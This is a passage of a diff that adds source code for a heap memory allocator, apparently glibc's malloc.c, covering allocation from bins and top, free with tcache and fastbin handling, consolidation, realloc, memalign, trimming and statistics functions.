+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
